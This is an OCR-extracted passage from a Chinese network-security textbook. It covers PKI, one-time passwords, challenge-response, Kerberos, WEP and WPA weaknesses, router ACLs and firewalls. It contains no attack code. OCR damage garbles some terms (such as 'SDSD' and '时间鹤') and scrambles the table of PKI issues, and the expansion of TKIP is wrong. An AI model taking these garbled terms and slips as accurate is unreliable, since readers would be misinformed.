(4) 通过 发 布 证 书 撤销 列表 来 确保 证 书 在 需要 的 时 候 被 撤销 。 

证 书 管理 中 心 的 功能 可 以 在 管理 中 心 的 内 部 或 一 个 商业 服务 或 可 信任 的 第 三 方 
进行 。 
PKI 还 包含 一 个 注册 管理 中 心 ,充当 用 户 和 证 书 管理 中 心 之 间 的 接口 。 注 册 管 理 中 
心 获取 并 鉴别 用 户 的 身份 ,然后 向 相应 的 证 书 管理 中 心 提交 一 个 证 书 请 求 。 从 这 个 意义 
上 来 看 ,注册 管理 中 心 非常 像 美 国 邮 政 管理 局 ;邮政 管理 局 扮演 的 角色 是 充当 美国 政府 部 
门 的 代理 ,允许 美国 公民 获取 护照 (美国 官方 证 书 )。 当 然 , 之 前 公民 必须 提供 一 些 适当 的 
表格 .身份 证 明 ,并 向 护照 发 行 办 公 室 (证 书 管理 中 心 ) 提 出 真实 护照 (与 证 书 类 似 ) 申 请 。 
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与 护照 类 似 , 注 册 管 理 中 心 的 性 质 决 定 了 发 放 证 书 的 信任 级 别 。 


许多 国家 正在 为 实现 PKI 而 努力 ,目的 是 允许 公司 和 政府 代理 实现 PKI 和 互 操作 。 
例如 ,美国 联邦 PKI Initiative 最 终 将 允许 任何 美国 政府 代理 在 合适 的 时 候 向 任何 其 他 美 
国政 府 代 理发 送 安全 的 通信 。 该 组 织 也 规定 了 实现 PKI 的 商业 工具 应 该 怎样 工作 ,以 便 
这 些 代理 可 以 去 买 已 经 做 好 的 PKI 产 品 ,而 不 需要 他 们 自己 来 开发 。 主 流 PKI 解决 方案 
开发 商 包括 Baltimore Technologies、Northern Telecom、Entrust 以 及 Identrus。 下 面 举 
例 说 明 PKI 在 银行 中 的 商业 应 用 。 

Lloyd's TSB 是 总 部 设 在 英国 的 一 家 储蓄 银行 ,在 2002 年 ,该 银行 实施 了 一 项 称 为 
KOB(Key Online Banking) 的 试验 计划 一 一 用 智能 卡 实现 在 线 银 行业 服务 。KOB 是 第 
一 个 将 基于 智能 卡 的 PKI 用 于 大 范围 网 上 银行 业务 的 项 目 。 市场 研究 结果 显示 : 75% 的 
银行 客户 是 被 KOB 提供 的 可 靠 的 安全 性 吸引 来 的 。 

要 想 使 用 KOB, 客 户 需 要 将 智能 卡 插入 一 台 像 ATM 机 一 样 的 设备 ,然后 输入 一 个 
唯一 的 PIN。 这 样 ,在 进行 任何 金融 交易 之 前 ,要 求 采用 的 鉴别 方法 是 两 步 法 。 智 能 卡 中 
包含 着 PKI 密 钥 对 和 数字 证 书 。 当 客户 完成 交易 之 后 ,他 通过 注销 并 取出 智能 卡 来 结束 
与 银行 的 会 话 。 

依照 Lloyd's TSB 的 分 布 式 商务 银行 主管 Alan Woods 的 话说 :“KOB 的 漂亮 之 处 
在 于 它 降低 了 商用 数字 身份 证 书 被 泄露 的 危险 。 这 是 因为 : 与 标准 PKI 系统 不 同 , 在 
KOB 的 PKI 中 ,用 户 的 私 钥 不 是 保存 在 他 们 的 工作 站 桌面 上 ,而 是 通过 智能 卡 本 身 来 发 
布 . 存 储 和 撤销 的 。 这 种 KOB 智能 卡 可 以 随时 保存 在 用 户 身 边 "。 使 用 它 , 客 户 可 以 更 
安全 地 进行 交易 。 

绝 大 多 数 PKI 进程 使 用 证 书 来 将 身份 与 一 个 密 钥 绑 定 在 一 起 。 但 是 ,目前 正在 研究 
将 证 书 的 概念 扩展 为 一 些 更 广 的 信任 特征 。 例 如 ,信用卡 公司 可 能 对 验证 你 的 经 济 状况 
比 验 证 你 的 身份 更 感 兴趣 ,他 们 使 用 的 PKI 方案 可 能 会 用 一 个 证 书 将 你 的 经 济 状 况 和 一 
个 密 钥 绑 定 在 一 起 。 简 单 分 布 式 安全 基础 设施 (Simple Distributed Security 
Infrastructure,SDSD 采 用 了 这 种 方案 ,包含 身份 证 书 、 组 成 员 关 系 证 书 和 名 称 绑 定 证 书 。 
已 经 出 现 了 两 个 相关 标准 的 草案 : ANSI 标准 X9. 45 和 基础 设施 (Simple Public Key 
Infrastructure, SPKD 。 

PKI 还 是 一 个 不 成 熟 的 处 理 方案 , 仍 有 很 多 问题 需要 解决 ,尤其 是 PKI 还 没有 在 大 
规模 的 应 用 环境 中 实现 。 表 7-2 列 出 了 在 学 习 有 关 PKI 的 更 多 内 容 时 应 该 注意 的 几 个 问 
题 。 然 而 ,有 些 事情 已 经 很 清楚 了 。 首 先 ,证 书 管理 中 心 应 该 经 过 独立 实体 的 批准 和 验 
证 。 证 书 管理 中 心 的 私 钥 应 该 存储 在 一 个 抗 自 改 的 安全 模块 中 。 其 次 ,对 证 书 管理 中 心 
和 注册 管理 中 心 的 访问 应 该 进行 严密 控制 ,可 通过 一 些 强 用 户 鉴 别 方式 (比如 智能 卡 ) 加 
以 实现 。 

在 对 证 书 进行 保护 时 涉及 的 安全 问题 还 包括 管理 过 程 。 例 如 ,应 该 要 求 有 多 个 操作 
者 同时 授权 证 书 请 求 。 还 应 该 设置 一 些 控制 措施 来 检测 黑客 并 阻止 他 们 发 布 伪造 的 证 书 
请 求 。 这 些 控制 措施 可 能 包括 使 用 数字 签名 和 强加 密 技 术 。 最 后 ,还 必须 进行 安全 审计 
跟踪 ,以 便 在 系统 出 现 故 障 时 能 够 重建 证 书信 息 , 以 及 在 攻击 真正 破坏 了 鉴别 过 程 时 能 够 
恢复 。 
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表 7-2 与 PKI 相 关 的 应 注意 的 问题 


特 性 问 题 
应 该 如 何 实现 互 操作 性 及 如 何 与 其 他 PKI 的 实现 保持 一 致 
。， 开 放 的 ,标准 的 接口 
。 兼容 的 安全 策略 
灵活 性 
应 该 如 何 注册 证 书 


。 面对面 注册 ,电子 邮件 注册 、Web 注册 还 是 通过 网 络 注册 
。 单个 注册 还 是 成 批注 册 ( 比 如 身份 证 .银行 卡 ) 


应 该 如 何 训练 人 们 设计 、 使 用 和 维护 PKI 
应 该 如 何 配置 和 集成 PKI 

应 该 如 何 与 新 用 户 合作 

应 该 如 何 进 行 备份 及 故障 恢复 

PKI 如 何 实现 一 个 组 织 机 构 的 安全 策略 
谁 有 责任 ,有 什么 样 的 责任 

应 该 如 何 加 入 更 多 的 用 户 

该 如 何 加 入 更 多 的 应 用 软件 

该 如 何 加 入 更 多 的 证 书 授权 

该 如 何 加 入 更 多 的 注册 授权 

该 如 何 扩展 证 书 的 类 型 

应 该 如 何 扩展 注册 机 制 


易 用 性 


对 安全 策略 的 支持 


尽 


车 


可 伸缩 性 


时 


革 


4. 身份 鉴别 

在 网 络 中 ,安全 地 实现 鉴别 可 能 会 很 困难 ,因为 网 络 环境 中 可 能 出 现 窃听 和 偷 听 。 而 
且 , 通 信 的 双方 可 能 需要 相互 鉴别 : 在 通过 网 络 发 送 口令 之 前 ,你 想 知 道 自己 确实 在 和 所 
期 望 的 主机 进行 通信 。 下 面 深 入 探讨 适用 于 网 络 环境 中 的 鉴别 方法 。 

1) 一 次 性 口令 

偷 听 威 胁 意味 着 在 一 个 不 安全 的 网 络 中 传输 的 用 户口 令 很 容易 被 窃听 。 采 用 一 次 性 
口令 可 以 预防 远程 主机 的 偷 听 和 欺骗 。 

顾名思义 ,一 次 性 口令 (One-Time Password) 只 能 使 用 一 次 。 要 想 知道 它 是 怎样 工 
作 的 , 先 来 考虑 最 早出 现 的 情况 。 那 时 ,用 户 和 主机 都 能 访问 同样 的 口令 列表 。 用 户 在 第 
一 次 登录 时 使 用 第 一 个 口令 ,第 二 次 登录 时 使 用 第 二 个 口令 ,依次 类 推 。 由 于 口令 列表 是 
保密 的 ,而 且 没 有 人 能 根据 一 个 口令 猜测 出 另 一 个 口令 ,因此 即使 通过 偷 听 获 得 了 一 个 口 
令 也 是 毫 无 用 处 的 。 然 而 ,正如 一 次 一 密 乱 码 本 一 样 ,人 们 在 维护 这 张口 令 列 表 时 会 遇 到 
麻烦 。 

为 了 解决 这 个 问题 ,可 以 使 用 一 个 口令 令 牌 (Password Token) ,这 是 一 种 专门 的 设 
备 ,用 于 产生 一 个 不 能 预测 但 可 以 在 接收 端 通过 验证 的 口令 。 最 简单 的 口令 令 牌 形式 是 
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同步 口令 令 牌 , 比 如 RSA Security 公司 的 SecurID 设备 。 这 种 设备 能 显示 出 一 个 随机 
数 ,而 且 每 分 钟 会 产生 一 个 新 的 随机 数 。 给 每 个 用 户 一 台 不 同 的 设备 (以 保证 产生 不 同 的 
密 钥 序列 ) 。 用 户 读 取 设 备 显 示 的 数据 ,将 其 作为 一 个 一 次 性 口令 输入 进去 。 接 收 端的 计 
算 机 执行 算法 产生 适合 于 当前 时 刻 的 口令 。 如 果 用 户 的 口令 与 远程 计算 得 出 的 口令 相 
符 , 则 该 用 户 就 能 通过 鉴别 。 由 于 设备 之 间 可 能 会 出 现 偏差 (比如 一 台 设 备 的 时 钟 走 得 比 
另 一 台 设 备 的 时 钟 稍 快 一 点 ) ,所 以 这 些 设备 还 需要 使 用 相应 的 规则 来 解决 时 间 的 漂移 
问题 。 

这 种 方法 有 什么 优 缺 点 呢 ? 首先 , 它 容易 使 用 ,因为 杜绝 了 通过 偷 听 重 用 口令 的 可 能 
性 。 由 于 它 采 用 了 一 种 强 口令 生成 算法 ,所 以 也 能 避免 被 欺骗 。 然 而 ,如 果 丢 失 了 口令 生 
成 器 ,或 者 过 到 更 糟糕 的 情况 ,口令 生成 器 落 入 了 一 名 攻击 者 的 手中 ,系统 就 会 面临 危险 。 
由 于 仅仅 每 隔 一 分 钟 就 会 产生 一 个 新 口令 ,所 以 只 有 一 个 很 小 (一 分 钟 ) 的 脆弱 性 窗口 留 
给 窃听 者 可 以 重用 一 个 窃听 的 口令 。 

2) 质询 -响应 系统 

为 了 避免 琉 失 和 重用 问题 ,一 种 更 为 老练 的 一 次 一 密 方案 是 使 用 质询 和 响应 方案 。 
质询 和 响应 设备 看 起 来 就 像 一 个 简单 的 计算 器 。 用 户 首先 到 设备 上 进行 鉴别 (通常 使 用 
PIN) ,远程 系统 就 会 发 送 一 个 称 为 “质询 ”的 随机 数 ,用户 将 其 输入 到 设备 之 中 。 然 后 , 设 
备 使 用 另 一 个 数字 进行 响应 ,而 后 用 户 将 其 传递 给 系统 。 

系统 在 用 户 每 一 次 使 用 时 都 会 用 一 个 新 的 “质询 ”来 提示 用 户 , 因 此 ,使 用 这 种 设备 消 
除了 用 户 重用 一 个 时 间 敏 感 的 鉴别 符 的 弱点 。 没 有 PIN ,响应 生成 器 即使 落 入 其 他 人 的 
手中 也 是 毫 无 用 处 的 。 然 而 ,用 户 也 必须 使 用 响应 生成 器 来 登录 ,而 且 设备 遭 到 破坏 也 会 
造成 用 户 得 不 到 服务 。 最 后 ,这 些 设备 不 能 排除 远程 主机 是 无 赖 的 可 能 性 。 

3) Digital 分 布 式 鉴别 

早 在 20 世纪 80 年 代 ,Digital 公司 就 已 经 意识 到 需要 在 一 个 计算 系统 中 鉴别 除 人 之 
外 的 其 他 实体 。 例 如 ,一 个 进程 接收 了 一 个 用 户 查 询 , 然 后 重 构 它 的 格式 或 者 进行 限制 ， 
最 后 提交 给 一 个 数据 库 管理 器 。 数 据 库 管理 器 和 查询 处 理 器 都 希望 能 确保 它们 之 间 的 通 
信 信 道 是 可 信任 的 。 这 些 服务 器 既 不 在 人 的 直接 控制 下 运行 ,也 没有 人 对 其 进行 监控 ( 尽 
管 每 一 个 进程 都 是 由 人 来 启动 的 ) 。 因 此 ,适用 于 人 的 访问 控制 用 在 这 里 是 不 合适 的 。 

Digital 公司 为 这 种 需求 建立 了 一 种 简单 的 结构 ,能 有 效 防范 以 下 威胁 : 

(1) 一 个 无 赖 进程 假冒 其 中 一 台 服 务 器 ,因为 两 台 服 务 器 都 涉及 鉴别 。 

(2) 窃听 或 者 修改 服务 器 之 间 交 换 的 数据 。 

(3) 重 放 一 个 以 前 的 鉴别 。 

在 这 种 结构 中 ,假设 每 一 台 服 务 器 都 有 自己 的 私有 密 钥 ,而 且 需 要 建立 一 个 鉴别 信道 
的 进程 可 以 获得 相应 的 公 钥 或 已 持 有 该 公 钥 。 为 了 在 服务 器 A 和 服务 器 B 之 间 开 始 一 
次 鉴别 通信 ,服务 器 A 向 服务 器 B 发 送 了 一 个 经 过 服务 器 B 的 公 钥 加 密 的 请 求 。 服 务 器 
B 将 该 请 求解 密 , 并 使 用 一 条 经 过 服务 器 A 的 公 钥 加 密 的 消息 作为 响应 。 为 了 避免 重 
放 , 服 务 器 A 和 服务 器 B 可 以 附加 一 个 随机 数 到 加 密 的 消息 中 。 

只 要 服务 器 A 和 服务 器 B 的 任 一 方 选 择 一 个 加 密 密 钥 (用 于 保密 密 钥 算法 ) ,并 在 鉴 
别 消息 中 将 密 钥 发 送 给 对 方 ,就 可 以 由 此 建立 起 一 个 私有 信道 。 一 旦 鉴别 完成 ,所 有 基于 
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该 保密 密 钥 的 通信 都 可 以 认为 是 安全 的 。 为 了 保证 信道 的 保密 性 ,Gasser 推荐 了 一 种 分 
离 的 加 密 处 理 器 (比如 智能 卡 ), 可 以 使 私 钥 永 远 不 会 暴露 在 处 理 器 之 外 。 

这 种 鉴别 机 制 在 实现 的 时 候 仍然 需要 解决 两 个 难题 : 怎样 才能 发 布 大 量 的 公 钥 ? 这 
些 公 钥 怎样 发 布 才能 确保 安全 地 将 一 个 进程 与 该 密 钥 进行 绑 定 ? Digital 公司 意识 到 需 
要 一 台 密 钥 服务 器 (也 许 有 若干 个 类 似 的 服务 器 ) 来 分 发 密 钥 。 第 二 个 难题 采用 证 书 和 证 
明 等 级 来 解决 。 

协议 的 其 余部 分 在 某 种 程度 上 本 身 就 暗示 了 这 两 种 设计 结果 。 另 外 一 种 不 同 的 方法 
是 由 Kerberos 提出 的 , 接 下 来 对 其 进行 介绍 。 

4) Kerberos 

Kerberos 是 一 个 系统 ,支持 在 分 布 式 系统 中 实现 鉴别 。 在 最 初 设计 时 ,采用 的 是 保 
密 密 钥 加 密 的 工作 方式 。 在 最 近 的 版 本 中 ,使 用 公 钥 技术 支持 密 钥 交换 。Kerberos 系统 
是 由 麻 省 理工 学 院 设 计 出 来 的 。 

Kerberos 用 于 智能 进程 之 间 的 鉴别 ,比如 客户 对 服务 器 或 者 用 户 工 作 站 对 其 他 主机 
的 鉴别 。Kerberos 的 思想 基础 是 : 中 心服 务 器 提供 一 种 称 为 票据 (Ticket) 的 已 鉴别 令 
牌 ,向 应 用 软件 提出 请 求 。 其 中 ,票据 是 一 种 不 能 伪造 ,不 能 重 放 和 鉴别 的 对 象 。 也 就 是 
说 , 它 是 一 种 用 户 可 以 获得 的 用 于 命名 一 个 用 户 或 者 一 种 服务 的 加 密 数据 结构 ,其 中 也 包 
含 一 个 时 间 值 和 一 些 控制 信息 。 

Kerberos 通过 仔细 地 设计 来 抵御 分 布 式 环境 中 的 各 种 攻击 : 

(1) 网 络 中 的 无 口令 通信 。 

(2) 加 密 保护 可 以 防止 欺骗。 

(3) 有 限 的 有 效 期 。 

(4) 时 间 鹤 阻止 重 放 攻 击 。 

(5) 相互 鉴别 。 

Kerberos 不 是 解决 分 布 式 系统 安全 问题 的 完美 答案 ,而 是 存在 着 以 下 问题 : 

(1) Kerberos 要 求 一 台 可 信任 的 票据 授权 服务 器 连续 可 用 。 

(2) 服务 器 的 真实 性 要 求 在 票据 授权 服务 器 与 每 一 台 服 务 器 之 间 保 持 一 种 信任 


(3) Kerberos 要 求实 时 传输 。 

(4) 一 个 被 暗中 破坏 的 工作 站 可 以 存储 用 户口 令 并 在 稍 后 重 放 该 口令 。 

(5) 口令 猜测 仍 能 奏效 。 

(6) Kerberos 不 具有 可 伸缩 性 。 

(7) Kerberos 是 一 整套 解决 方案 ,不 能 与 其 他 方案 结合 使 用 。 

5) WEP 

IEEE 802.11 无 线 标 准 依赖 的 加 密 协 议 称 为 有 线 等 效 保密 (Wired Equivalent 
Privacy,WEP) 协 议 。WEP 提供 的 用 户 保密 性 等 效 于 有 线 专用 的 保密 性 ,可 防止 偷 听 和 
假冒 攻击 。WEP 在 客户 端 与 无 线 访问 点 间 使 用 共享 密 钥 。 为 了 鉴别 用 户 ,无 线 访问 点 发 
送 一 个 随机 的 数字 给 客户 端 ,客户 端 使 用 共享 密 钥 加 密 , 再 返回 给 无 线 访问 点 。 从 这 时 
起 ,客户 端 与 无 线 访问 点 已 被 鉴别 ,就 可 使 用 共享 密 钥 进行 通信 。 
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WEP 标准 使 用 64 位 或 128 位 密 钥 。 用 户 以 任何 方便 的 方式 输入 密 钥 ,通常 是 十 六 
进 制 数字 ,或 可 转换 为 数字 的 包含 文字 和 数字 的 字符 串 。 输 入 十 六 进 制 数 的 64 位 或 128 
位 数字 要 求 客户 端 和 访问 点 选择 并 正确 地 输入 16 个 或 32 个 符号 。 常 见 的 十 六 进 制 字符 
串 如 CODE CODE……(C 和 D 之 间 是 数字 0) 。 在 字典 攻击 面前 ,口令 是 脆弱 的 。 

即使 密 钥 是 强壮 的 ,但 是 在 算法 中 的 使 用 方式 还 是 决定 了 密 钥 的 有 效 长 度 只 有 40 位 
或 104 位 。 对 于 40 位 密 钥 ,暴力 攻击 会 很 快 成 功 。 甚 至 对 于 104 位 密 钥 ,RC4 算法 中 的 
缺陷 及 其 使 用 方式 也 将 导致 WEP 安全 失效 。 以 WEPCrack 和 AirSnort 开始 ,有 几 个 工 
具 帮 助攻 击 者 通常 能 在 几 分 钟 内 破解 WEP 加 密 。 在 2005 年 的 一 次 会 议 上 ,FBI 演示 了 
破解 WEP 安全 的 无 线 会 话 非常 容易 。 

基于 这 些 原 因 ,2001 年 ,IEEE 开始 对 无 线 设计 一 个 新 鉴别 和 加 密 方案 。 遗 憾 的 是 ， 
一 些 仍然 在 市 场 流通 的 无 线 设备 仍 在 使 用 WEP 的 假 安全 。 

6) WPA 和 WPA2 

替代 WEP 的 一 项 安全 技术 是 2003 年 通过 的 Wi-Fi 保护 访问 (Wi-Fi Protected 
Access,WPA)。2004 年 通过 了 WPA2, 它 是 IEEE 标准 802. 1li, 是 WPA 的 扩展 版 。 
WPA 是 如 何 改进 WEP 的 呢 ? 

首先 ,直到 用 户 在 客户 端 和 无 线 访问 点 输入 新 的 密 钥 之 前 ,WEP 使 用 的 密 钥 是 不 能 
改变 的 。 因 为 一 个 固定 的 密 钥 给 攻击 者 提供 了 大 量 的 密 文 来 进行 尝试 ,并 有 充足 的 时 间 
来 分 析 它 ,所 以 ,加 密 学 家 讨厌 不 改变 密 钥 。WPA 有 一 种 密 钥 改变 方法 , 称 为 暂时 密 钥 
集成 程序 (Temporal Key Integrity Program,TKIP) ,使 用 TKIP 可 针对 每 个 包 自 动 改变 
密 钥 。 

其 次 ,尽管 不 安全 , WEP 仍然 使 用 密 钥 作为 鉴别 器 。WPA 使 用 可 扩展 鉴别 协议 
(Extensible Authentication Protocol, EAP) ,在 这 种 协议 中 ,口令 , 令 牌 ,数字 证 书 或 其 他 
机 制 均 可 用 于 鉴别 。 对 小 型 网 络 (家 用 网 络 ) 用 户 ,可 能 仍然 共享 密 钥 ,这 还 是 不 理想 。 用 
户 易于 选择 弱 密 钥 ,如 短 数 字 或 口令 而 遭受 字典 攻击 。 

WEP 的 加 密 算法 是 RC4, 这 种 算法 在 密 钥 长 度 和 设计 上 有 加 密 缺 陷 。 在 WEP 中 ， 
针对 RC4 算法 ,初始 化 向 量 只 有 24 位 , 太 短 ,以 至 于 经 常 发 生 碰 撞 ; 此 外 ,不 经 检查 就 重 
用 初始 化 向 量 。WPA2 增加 AES 作为 可 能 使 用 的 加 密 算法 (基于 兼容 性 考虑 ,仍然 支持 
RC4) 。 

WEP 包含 与 数据 分 开 的 32 位 完整 性 检查 。 但 因为 WEP 加 密 易 于 遭受 密码 分 析 破 
译 法 攻击 ,完整 性 检查 也 将 遭受 攻击 ,这样 ,攻击 者 可 能 修改 内 容 和 相应 的 检查 数据 ,而 不 
需要 知道 关联 的 密 钥 。WPA 包括 64 位 加 密 的 完整 性 检查 。 

WPA 和 WPA2 建立 的 协议 比 WEP 的 更 健壮 。WPA 协议 的 建立 涉及 三 个 步骤 ， 
鉴别 .4 次 握手 (确保 客户 端 可 生成 加 密 密 钥 ,在 通信 的 两 端 ,为 加 密 与 完整 性 生成 并 安 
装 密 钥 ) 和 可 选 的 组 密 钥 握手 (针对 组 播 通信 )。WPA 和 WPA2 解决 了 WEP 缺乏 的 安 
全 性 。 

5. 访问 控制 

鉴别 解决 安全 策略 中 谁 实施 访问 的 问题 ,而 访问 控制 解决 安全 策略 中 如 何 实 施 访问 
及 允许 访问 什么 内 容 的 问题 。 
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1) ACL 和 路 由 器 

路 由 器 的 主要 任务 是 定向 网 络 流量 ,它们 将 流量 发 送 到 自己 所 控制 的 子 网 ,或 者 发 送 
给 其 他 路 由 器 ,以 便 随 后 传递 到 其 他 子 网 。 路 由 器 将 外 部 IP 地 址 转换 成 本 地 子 网 中 对 应 
主机 的 内 部 MAC 地 址 。 

假设 有 一 台 主 机 被 一 台 恶 意 的 无 赖 主机 发 来 的 数据 包 塞 满 了 (被 淹没 了 )。 可 以 配置 
路 由 器 的 访问 控制 列表 (Access Control List, ACL) ,使 其 拒绝 某 些 特定 主机 对 另 一 些 特 
定 主机 的 访问 。 这 样 ,路 由 器 就 可 以 删除 源 地 址 是 某 台 无 赖 主机 的 数据 包 , 以 及 目的 地 址 
是 某 台 目标 主机 的 数据 包 。 

然而 ,这 种 方法 存在 着 三 个 问题 。 首 先 ,一 个 大 型 网 络 中 的 路 由 器 要 完成 大 量 工作 : 
它们 必须 处 理 流 入 和 流出 网 络 的 每 一 个 包 。 在 路 由 器 中 增加 一 些 ACL 就 要 求 路 由 器 将 
每 一 个 包 与 这 些 ACL 进行 比较 。 增 加 一 个 ACL 就 会 降低 路 由 器 的 性 能 ;增加 的 ACL 
太 多 ,就 会 使 路 由 器 的 性 能 变 得 使 人 不 能 接受 。 第 二 个 问题 也 是 一 个 效率 问题 : 因为 路 
由 器 要 做 大 量 工作 ,所 以 它们 被 设计 成 仅仅 提供 一 些 必 需 的 服务 。 日 志 记录 工作 通常 不 
会 在 路 由 器 上 进行 处 理 , 因 为 需要 处 理 的 通信 量 非 常 大 ,如 果 再 记录 日 志 , 就 会 降低 性 能 。 
然而 ,对 ACL 而 言 ,日 志 却 是 很 有 用 的 ,从 日 志 中 可 以 知道 有 多 少 包 被 删除 了 ,以 及 知道 
一 个 特定 的 ACL 是 否 可 以 被 删除 (以 此 来 提高 性 能 )。 但 是 ,由 于 路 由 器 不 提供 日 志 记 
录 服 务 , 所 以 不 可 能 知道 一 个 ACL 是 否 被 使 用 了 。 这 两 个 问题 共同 暗示 了 : 路 由 器 上 的 
ACL 是 最 有 效 地 防止 已 知 威胁 的 方法 ,但 却 不 能 不 加 选择 地 使 用 它们 。 

在 路 由 器 上 设置 ACL 的 最 后 一 个 限制 是 出 于 对 攻击 本 身 的 考虑 。 路 由 器 仅仅 查看 
源 和 目的 地 址 。 攻 击 者 通常 不 会 暴露 实际 的 源 地 址 ,暴露 真实 的 源 地 址 无 异 于 银行 动 菲 
在 抢劫 时 留 下 了 家 庭 住址 和 一 个 计划 存放 赃款 地 点 的 说 明 。 

由 于 在 UDP 数据 报 中 可 以 很 容易 地 伪造 任何 源 地 址 ,所 以 许多 攻击 者 都 使 用 有 伪 
造 源 地 址 的 UDP 协议 实施 攻击 ,以 便 攻 击 不 会 轻易 地 被 一 个 有 ACL 的 路 由 器 所 阻止 ， 
因为 路 由 器 的 ACL 仅仅 是 在 攻击 者 发 送 很 多 使 用 相同 的 伪造 源 地 址 的 数据 报时 才 会 
有 用 。 

从 总 体 上 来 说 ,路 由 器 是 一 个 出 色 的 访问 控制 点 ,因为 它 处 理 了 子 网 中 每 一 个 流入 和 
流出 的 包 。 在 某 些 特定 环境 下 (主要 是 指 内 部 子 网 ), 可 以 有 效 地 使 用 ACL 来 限制 某 些 
通信 流 , 例 如 只 允许 某 些 主机 (地 址 ) 访 问 一 个 内 部 网 络 的 管理 子 网 。 但 是 如 果 在 大 型 网 
络 中 ,过 滤 普 通 流量 ,路 由 器 不 如 防火 墙 管用 。 

2) 防火 墙 

防火 墙 被 设计 来 完成 不 适合 路 由 器 做 的 过 滤 工作 。 这 样 ,路 由 器 的 主要 功能 是 寻 址 ， 
而 防火 墙 的 主要 功能 是 过 滤 。 当 然 , 防 火 墙 也 可 以 做 一 些 审计 工作 。 而 且 更 重要 的 是 , 防 
火 墙 甚 至 可 以 检查 一 个 包 的 全 部 内 容 ,包括 数据 部 分 。 而 路 由 器 仅仅 关心 源 和 目的 
MAC 地 址 与 IP 地 址 。 
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7.2 防 火 墙 


防火 墙 作 为 网 络 安全 防御 体系 中 的 第 一 道 防线 ,通过 一 组 软 , 硬 件 设备 ,在 内 部 安全 
网 络 和 外 部 不 安全 网 络 之 间 构 建 一 道 保 护 屏障 ,对 二 者 之 间 的 网 络 数据 流量 进行 控制 , 阻 
止 对 信息 资源 的 非法 访问 ,做 到 御 敌 于 外 。 简 单 地 说 ,防火 墙 是 位 于 两 个 或 多 个 网 络 之 
间 , 实 施 访问 控制 策略 的 一 组 组 件 。 


721 防火 墙 概述 


1. 什么 是 防火 墙 

防火 墙 (Firewall) 的 本 义 是 指 古 代 建 造 木 质 结构 的 房屋 时 ,在 房屋 周转 用 坚固 的 石 
块 堆砌 的 一 道 屏障 ,以 防火 灾 发 生 时 火势 的 葛 延 。 在 网 络 安 全 中 ,防火 墙 是 位 于 两 个 信任 
程度 不 同 的 网 络 之 间 ( 如 企业 内 部 网 络 和 Internet 之 间 ) 的 软件 或 硬件 设备 的 组 合 ,如 
图 7-10 所 示 。 它 对 两 个 网 络 之 间 的 通信 进行 控制 ,通过 强制 实施 统一 的 安全 策略 ,防止 
对 重要 信息 资源 的 非法 存 取 和 访问 以 达到 保护 系统 安全 的 目的 。 防 火 墙 应 用 的 典型 情况 
是 ,保护 企业 内 部 网 络 免 受 外 部 不 安全 的 因特网 的 侵害 ,但 也 不 局 限于 此 ,防火 墙 也 可 用 
于 内 部 网 各 部 门 网 络 之 间 ,例如 财务 部 和 市 场 部 之 间 , 即 内 部 防火 墙 。 
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防火 墙 
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图 7-10 防火 墙 示意 图 


一 个 好 的 防火 墙 应 该 满足 如 下 条 件 : 

(1) 内 部 和 外 部 之 间 的 所 有 网 络 数据 流 必 须 经 过 防火 墙 。 

(2) 只 有 符合 安全 策略 的 数据 流 才能 通过 防火 墙 。 

(3) 防火 墙 本 身 应 对 渗透 免疫 。 

(4) 使 用 智能 卡 、 一 次 口令 认证 等 强 认证 机 制 。 

(5) 人 机 界面 良好 ,用 户 配置 方便 , 易 管 理 。 

2. 防火 墙 的 作用 

防火 墙 作为 内 部 网 与 外 部 网 之 间 的 一 种 访问 控制 系统 ,常常 安装 在 内 部 网 和 外 部 网 
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交界 的 点 上 。 它 经 常 被 比喻 为 网 络 安全 的 门卫 ,对 所 有 进出 大 门 的 人 员 的 身份 和 进出 权 
限 进行 检查 。 检 查 的 依据 , 则 是 防火 墙 上 部 署 的 安全 策略 ,以 此 建立 全 方位 的 防御 体系 来 
保护 机 构 的 信息 资源 。 如 果 只 部 署 防火 墙 系统 ,而 没有 全 面 的 安全 策略 ,那么 防火 墙 就 形 
同 虚设 。 防 火 墙 主要 通过 以 下 4 种 手段 来 执行 安全 策略 和 实现 网 络 访问 控制 ; 

(1) 服务 控制 : 确定 可 以 访问 的 网 络 服务 类 型 ,可 基于 IP 地 址 和 TCP 端口 过 滤 
通信 。 

(2) 方向 控制 : 确定 允许 通过 防火 墙 的 特定 服务 请 求 发 起 的 方向 。 

(3) 用 户 控制 : 控制 访问 服务 的 人 员 。 

(4) 行为 控制 : 控制 服务 的 使 用 方式 ,如 E-mail 过 滤 等 。 

除了 网 络 流量 过 滤 这 一 主要 功能 外 ,防火 墙 一 般 还 能 实现 各 种 网 络 安全 管理 的 功能 ， 
例如 网 络 监控 审计 、 支 持 NAT(Network Address Translation ,网 络 地 址 翻译 ) 部 署 .支持 
VPN(Virtual Private Network ,虚拟 专用 网 ) 等 。 

3. 防火 墙 的 局 限 性 

虽然 防火 墙 可 以 提高 内 部 网 络 的 安全 性 ,但 是 ,防火 墙 并 非 万 能 ,也 存在 一 些 缺 陷 和 
不 足 , 有 些 缺 陷 甚 至 是 目前 根本 无 法 解决 的 。NIST 曾 客 观 的 对 防火 墙 做 出 评价 : 

(1) 限制 有 用 的 网 络 服务 。 防 火 墙 采取 的 访问 控制 机 制 , 限 制 或 关闭 了 很 多 有 用 但 
存在 安全 缺陷 的 网 络 服务 ,给 用 户 造成 不 便 , 这 可 能 会 带 来 传输 延迟 .性 能 瓶颈 和 单 点 
失效 。 

(2) 无 法 防范 来 自 内 部 的 攻击 。 由 于 防火 墙 最 初 的 设计 思想 是 以 本 地 专用 网 络 的 安 
全 为 前 提 , 要 防范 的 只 是 来 自 外 部 的 可 能 的 攻击 ,因此 不 能 对 内 部 威胁 提供 支持 ,也 不 能 
对 绕 过 防火 墙 的 攻击 提供 保护 。 

(3) 无 法 防范 数据 驱动 型 的 攻击 。 防 火 墙 不 能 有 效 的 防范 数据 内 容 驱 动 式 的 攻击 ， 
对 病毒 传输 的 保护 能 力也 很 弱 , 没 有 对 多 媒体 信息 传输 包 的 内 容 检 测 , 也 存在 潜在 的 
威胁 。 

(4) 无 法 防范 新 的 网 络 安全 问题 。 防 火 墙 是 一 种 被 动 式 的 防护 手段 ,只 能 对 现在 已 
知 的 网 络 威胁 起 作用 ,并 不 能 自动 防范 网 络 上 不 断 出 现 的 新 的 威胁 和 攻击 。 


722 防火 墙 的 类 型 


根据 防火 墙 的 技术 特征 ,常见 的 防火 墙 可 以 分 为 如 下 几 个 类 型 , 

(1) 包 过 滤 (Packet Filtering) 。 

(2) 状态 包 过 滤 (Stateful Packet Filtering) 。 

